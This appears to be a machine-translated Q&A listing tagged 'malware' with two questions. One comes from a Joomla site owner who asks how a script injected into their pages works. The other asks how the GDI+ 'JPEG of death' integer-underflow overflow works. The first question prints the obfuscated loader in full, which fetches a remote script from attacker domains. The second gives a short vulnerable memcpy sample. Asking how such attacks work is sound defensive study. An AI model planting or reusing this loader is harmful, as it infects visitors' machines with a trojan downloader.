タグ付けされた質問 「malware」

私のJoomla！ウェブサイトは繰り返しハッキングされています。誰かが、どういうわけか、次のゴミを主要なphpスクリプトに挿入できましたが、私はJoomlaの設定について話すつもりはありません。サイトはあまり訪問されておらず（私がそのサイトへの唯一の訪問者である可能性があることを恐れる場合があります...）、サイトをバックアップして実行することにあまり関心がありません。最終的にはそれを処理します。 私の質問は、このゴミはどのように機能するのですか？私はそれを見て、これがどのようにして害を及ぼすことができるのかわかりません。トロイの木馬に感染したChangeLog.pdfと呼ばれるPDFファイルをダウンロードしようとすると、Acrobatがフリーズし、マシンに大混乱が生じます。それはどのように行われますか、わかりません。気にしません。しかし、次のスクリプトはどのようにダウンロードを呼び出しますか？ <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!--6f471c20c9b96fed179c85ffdd3365cf--> ESETはこのコードをJS / TrojanDownloader.Agent.NROトロイの木馬として検出しました

99 javascript  joomla  code-injection  malware 

私が取り組んでいるプロジェクトの死のJPEGと呼ばれる、Windows XPおよびWindows Server 2003の GDI +に対する古いエクスプロイトについて読んでいます。 エクスプロイトについては、次のリンクで詳しく説明されています。http： //www.infosecwriters.com/text_resources/pdf/JPEG.pdf 基本的に、JPEGファイルには、COMと呼ばれる（空の可能性がある）コメントフィールドを含むセクションと、COMのサイズを含む2バイトの値が含まれています。コメントがない場合、サイズは2です。リーダー（GDI +）はサイズを読み取り、2を引いて、適切なサイズのバッファーを割り当てて、ヒープにコメントをコピーします。攻撃で0は、フィールドに値を配置します。GDI +はを減算し2、その値はによって-2 (0xFFFe)符号なし整数に変換さ0XFFFFFFFEれmemcpyます。 サンプルコード： unsigned int size; size = len - 2; char *comment = (char *)malloc(size + 1); memcpy(comment, src, size); ことを観察するmalloc(0)3行目のヒープ上に割り当てられていないメモリへのポインタを返すべきです。どのようにして0XFFFFFFFEバイト（4GB!!!!）を書き込むとプログラムがクラッシュしないのでしょうか？これは、ヒープ領域を超えて、他のプログラムやOSの領域に書き込みますか？次に何が起こりますか？ 私が理解しているようにmemcpy、それは単にn宛先からソースに文字をコピーします。この場合、ソースはスタックにあり、宛先はヒープにありnます4GB。

94 c++  security  memcpy  malware